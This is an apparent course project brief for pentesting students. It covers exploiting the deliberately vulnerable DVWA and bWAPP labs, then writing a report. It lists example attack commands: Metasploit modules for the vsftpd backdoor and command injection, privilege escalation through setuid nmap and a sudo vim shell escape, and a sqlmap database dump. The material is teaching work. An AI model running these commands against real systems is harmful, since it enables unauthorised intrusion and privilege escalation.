Pentesting Exploitation Project on a Vulnerable Website

By @rosinni and other contributors at 4Geeks Academy

Estas instrucciones estan disponibles en español

Before you start...

We need you! These exercises are built and maintained in collaboration with contributors such as yourself. If you find any bugs or misspellings please contribute and/or report them.

🌱 How to Start This Project

Do not clone this repository! Just follow the instructions.

This exercise aims to teach students how to exploit vulnerabilities found in a vulnerable web application (DVWA) using Metasploitable. This includes detecting exploitable vulnerabilities and privilege escalation. Note: No post-exploitation activities will be performed.

This is the third of 4 projects that will give you a comprehensive understanding of pentesting. The focus of this phase is on "Exploitation" in a Vulnerable Web Application.

Requirements

• Complete the Pentesting Reconnaissance Report [Pentesting report v1](wait for url).
• Have access to a machine with DVWA.
• Have access to an attacking machine (e.g., Kali Linux).

Required Tools

• Nmap (to confirm vulnerabilities)
• Metasploit Framework
• Access to vulnerability databases (e.g., Exploit-DB)
• Additional tools based on vulnerabilities (e.g., Hydra for brute force, netcat)

📝 Instructions

Step 1: Confirm Vulnerabilities

• Start the DVWA machine.
• Access DVWA through your web browser at http://<IP-Target>/dvwa.
• Log in to DVWA with the default credentials:
  • Username: admin
  • Password: password
• Obtain the IP address of DVWA using ifconfig. Example:

  ifconfig

• On your attacking machine (e.g., Kali Linux), open a terminal and run the following command to confirm vulnerabilities, replacing <IP-Target> with the IP of the DVWA machine:

  sudo nmap -sV --script=vuln <IP-Target>

Step 2: Detect Exploitable Vulnerabilities

• Research the confirmed vulnerabilities using databases like Exploit-DB or CVE Details.
• Identify available exploits for the detected vulnerabilities.

Step 3: Exploit Vulnerabilities

• Use Metasploit to exploit the identified vulnerabilities.
  • Example: Exploit a vulnerability in the FTP service.

    msfconsole
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOST <IP-Target>
    run

  • Example: Exploit a Command Injection vulnerability in DVWA.

    msfconsole
    use exploit/unix/webapp/dvwa_command_injection
    set RHOST <IP-Target>
    set RPORT 80
    set TARGETURI /dvwa/vulnerabilities/exec/
    run

Step 4: Escalate Privileges

• Identify privilege escalation techniques on the target machine.
• Use local exploits or manual techniques to escalate privileges.
  • Example: Privilege escalation using a local exploit.

    use exploit/linux/local/setuid_nmap
    set SESSION <session_id>
    run

  • Example: Privilege escalation using a sudo vulnerability.

    sudo -l
    sudo vim -c '!sh'

Step 5: Document the Exploitation Process

• Detail each step taken during exploitation.
  • Include commands used, screenshots, and results obtained.
• Write a Pentesting v2 report with the exploited vulnerabilities, methods used, and results.
• Reflect on the impact of the exploited vulnerabilities.
• Propose mitigation measures for the vulnerabilities found and exploited.

Format for Pentesting Report v2

• Introduction

  • Summary of the exercise's objective and scope.

• Methodology

  • Tools and techniques used.

• Results

  • Details of exploited vulnerabilities.
  • Commands and tools used for exploitation.
  • Screenshots and evidence.

• Privilege Escalation

  • Techniques used and results obtained.

• Mitigation

  • Proposals to remediate the exploited vulnerabilities.

• Conclusion

  • Impact of the vulnerabilities and reflection on the process.

---

😎 Feeling Confident? Want to Keep Practicing?

Plus: Performing the Exercise Using BeeBox

If you want to keep practicing and apply your knowledge in another environment, you can use BeeBox with bWAPP. Taking advantage of your previous experience with BeeBox, here's an option to perform the exercise using BeeBox:

1. Start BeeBox and bWAPP:

   • Start the BeeBox virtual machine.
   • Ensure bWAPP is running.

2. Confirm Vulnerabilities:

   • Obtain the IP address of BeeBox using ifconfig.
   • On your attacking machine, use Nmap to scan for vulnerabilities in bWAPP.

     sudo nmap -sV --script=vuln <IP-Target>

3. Detect Exploitable Vulnerabilities:

   • Research confirmed vulnerabilities in bWAPP using databases like Exploit-DB.

4. Exploit Vulnerabilities:

   • Use tools like sqlmap to exploit vulnerabilities in bWAPP.
     • Example: SQL Injection

       sqlmap -u "http://<IP-Target>/bWAPP/sqli_1.php?id=1" --dbs

5. Document the Process:

   • Detail each step taken during exploitation in BeeBox.
   • Include commands used, screenshots, and results obtained.

This structure allows students to apply and compare their skills in two different environments, first with Metasploitable and DVWA, and then with BeeBox and bWAPP. The main exercise provides a solid foundation in using Metasploit and exploiting a vulnerable machine, while the plus exercise broadens experience to another environment and tool. By documenting and reflecting on each step, you'll be better prepared to face real-world pentesting challenges.

Contributors

Thanks goes to these wonderful people (emoji key):

1. Rosinni Rodríguez (rosinni) contribution: (build-tutorial) ✅, (documentation) 📖

2. Alejandro Sanchez (alesanchezr), contribution: (bug reports) 🐛

This project follows the all-contributors specification. Contributions of any kind are welcome!